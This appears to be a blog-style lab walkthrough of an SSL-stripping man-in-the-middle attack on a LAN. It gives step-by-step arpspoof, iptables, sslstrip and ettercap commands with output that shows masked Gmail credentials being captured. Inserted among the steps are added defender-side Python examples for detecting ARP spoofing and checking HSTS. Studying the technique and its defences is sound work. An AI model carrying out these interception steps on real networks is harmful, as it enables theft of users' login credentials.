I had been using ssldump to decode SSL traffic, but I went looking for a better tool...
I tried decoding SSL traffic with sslstrip, arpspoof and ettercap.
SSL client: 192.168.1.2 ( Windows )
sslstrip, arpspoof, ettercap machine: 192.168.1.3 ( BackTrack Linux 4 final )
Internet --- Router 1.254 --- 1.3 Windows
--- 1.2 eth0 BackTrack Linux
[ sslstrip machine ]
- Edit the ettercap configuration file
ettercap NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks
root@bt:# vi /etc/etter.conf
Uncomment the following two lines:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Enable IP forwarding
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1
- Run arpspoof
arpspoof -t <target IP> <default gateway>
root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254
OPTIONS
-i interface   Specify the interface to use.
-t target      Specify a particular host to ARP poison (if not specified, all hosts on the LAN).
host           Specify the host you wish to intercept packets for (usually the local gateway).
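As an added, defender-side example (not from the original post): the arpspoof step above works by sending forged ARP replies that rebind the gateway's IP to another MAC. The Python below parses tcpdump -n style ARP reply lines and flags the two signs of that, an IP whose MAC changes and a MAC that answers for more than one IP; the sample lines are constructed to mirror the lab addresses (gateway 192.168.1.254, client 192.168.1.2, the 192.168.1.3 host), and the MAC addresses are made up.

```python
import re
from collections import defaultdict

# tcpdump -n prints an ARP reply as:
# "17:34:41.000200 ARP, Reply 192.168.1.254 is-at 00:1d:7e:11:22:33, length 28"
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+(?:\.\d+){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)


def detect_arp_spoof(lines, trusted=None):
    """Return alerts for an IP whose MAC changes and for a MAC that answers
    for more than one IP.  trusted: optional {ip: mac} of known-good bindings
    (e.g. the gateway) so the very first forged reply is caught, not learned."""
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)
    alerts = []
    for line in lines:
        m = ARP_REPLY.match(line)
        if not m:                        # requests and non-ARP lines are ignored
            continue
        ts, ip, mac = m["ts"], m["ip"], m["mac"].lower()
        known = bindings.setdefault(ip, mac)   # first sighting of an IP is learned
        if known != mac:
            alerts.append({"ts": ts, "kind": "binding-change",
                           "ip": ip, "expected": known, "seen": mac})
        claimed = ips_by_mac[mac]
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:         # one NIC now speaks for two addresses
                alerts.append({"ts": ts, "kind": "mac-claims-multiple-ips",
                               "mac": mac, "ips": sorted(claimed)})
    return alerts


# Constructed sample (MACs made up): genuine gateway reply, the 192.168.1.3
# host's own reply, then two forged replies rebinding the gateway IP to its MAC.
SAMPLE = """\
17:34:40.000001 ARP, Request who-has 192.168.1.254 tell 192.168.1.2, length 28
17:34:40.000200 ARP, Reply 192.168.1.254 is-at 00:1d:7e:11:22:33, length 28
17:34:41.000001 ARP, Reply 192.168.1.3 is-at 00:0c:29:aa:bb:cc, length 28
17:34:42.000001 ARP, Reply 192.168.1.254 is-at 00:0c:29:aa:bb:cc, length 28
17:34:44.000001 ARP, Reply 192.168.1.254 is-at 00:0c:29:aa:bb:cc, length 28
""".splitlines()

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE):
        print(alert)
```

Seeding trusted with the real gateway binding (from a switch's MAC table or a DHCP lease file) is what makes the first forged reply visible when the capture starts after the poisoning did.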
- Redirect traffic destined for port 80 to port 10000 ( sslstrip listens on port 10000 and strips the SSL traffic )
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Start sslstrip
root@bt:~# sslstrip -a -f -k
sslstrip 0.6 by Moxie Marlinspike running...
- sslstrip is listening on port 10000 ( lsof shows the port under its /etc/services name, webmin )
root@bt:~# lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root 4u IPv4 23821 TCP *:webmin (LISTEN)
root@bt:~# sslstrip --help
sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip
Options:
-w , --write= Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l , --listen= Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
- Packet capture
root@bt:~# ettercap -T -q -i eth0
Log in to Gmail from Windows ( IE ).
The username and password are visible ( on the sslstrip machine ).
root@bt:~# ettercap -T -q -i eth0
HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com PASS: xxxxx INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
The output can also be shown in html mode ( -V html ).
root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE
GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP
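An added, defender-side check, not from the original post: in the capture above the site moves the browser to https:// only through a Refresh header in a plain-HTTP response, which is exactly the hop an SSL-stripping proxy can rewrite. The Python below parses a response head for that redirect and for a Strict-Transport-Security policy (which browsers honour only when it arrives over HTTPS) and reports which protection applies; the sample heads are constructed, the first repeating the headers captured above and the second a hardened variant with a made-up hostname.

```python
import re
from urllib.parse import urlsplit

def parse_head(raw):
    # -> (status_code, {lower-cased header name: value})
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(lines[0].split()[1]), headers

def redirect_target(status, headers):
    # URL the browser is sent to, via Location or a "Refresh: 0;URL=..." header
    if 300 <= status < 400 and "location" in headers:
        return headers["location"]
    m = re.match(r"\s*\d+\s*;\s*url=(\S+)", headers.get("refresh", ""), re.I)
    return m.group(1) if m else None

def hsts_policy(headers):
    value = headers.get("strict-transport-security")
    if value is None:
        return None
    m = re.search(r"max-age=(\d+)", value, re.I)
    return {"max_age": int(m.group(1)) if m else 0,
            "include_subdomains": "includesubdomains" in value.lower()}

def assess(raw, delivered_over):
    # delivered_over is "http" or "https"; browsers ignore HSTS sent over plain HTTP
    status, headers = parse_head(raw)
    policy = hsts_policy(headers) if delivered_over == "https" else None
    if policy and policy["max_age"] > 0:
        return "hsts-pinned"               # client upgrades future http:// requests itself
    target = redirect_target(status, headers)
    if target and urlsplit(target).scheme == "https":
        return "upgrade-by-redirect-only"  # the one hop a stripping proxy can rewrite
    return "no-upgrade"

# Constructed samples: the first repeats the headers captured above, the second
# is a hardened variant with a made-up hostname.
CAPTURED_HEAD = """\
HTTP/1.1 200 OK
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
"""
HARDENED_HEAD = """\
HTTP/1.1 301 Moved Permanently
Location: https://mail.example.invalid/mail/
Strict-Transport-Security: max-age=31536000; includeSubDomains
"""
```

With delivered_over set to "http" even the hardened head rates only "upgrade-by-redirect-only", which is why the HSTS header has to be served over HTTPS, and why the very first visit is covered only by the browser preload list.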
-V, --visual FORMAT
Use this option to set the visualization method for the packets to be displayed.
FORMAT may be one of the following:
hex      Print the packets in hex format.
         example: the string "HTTP/1.1 304 Not Modified" becomes:
         0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74   HTTP/1.1 304 Not
         0010: 204d 6f64 6966 6965 64                    Modified
ascii    Print only "printable" characters; the others are displayed as dots '.'
text     Print only the "printable" characters and skip the others.
ebcdic   Convert an EBCDIC text to ASCII.
html     Strip all the html tags from the text. A tag is every string between < and >.
         example ( tags already stripped ):
         This is the title, but the following will not be displayed.
utf8     Print the packets in UTF-8 format. The encoding used while performing the conversion is declared in the etter.conf(5) file.
The trick is a man-in-the-middle attack ( Man in The Middle Attack ): the SSL traffic is intercepted and decoded.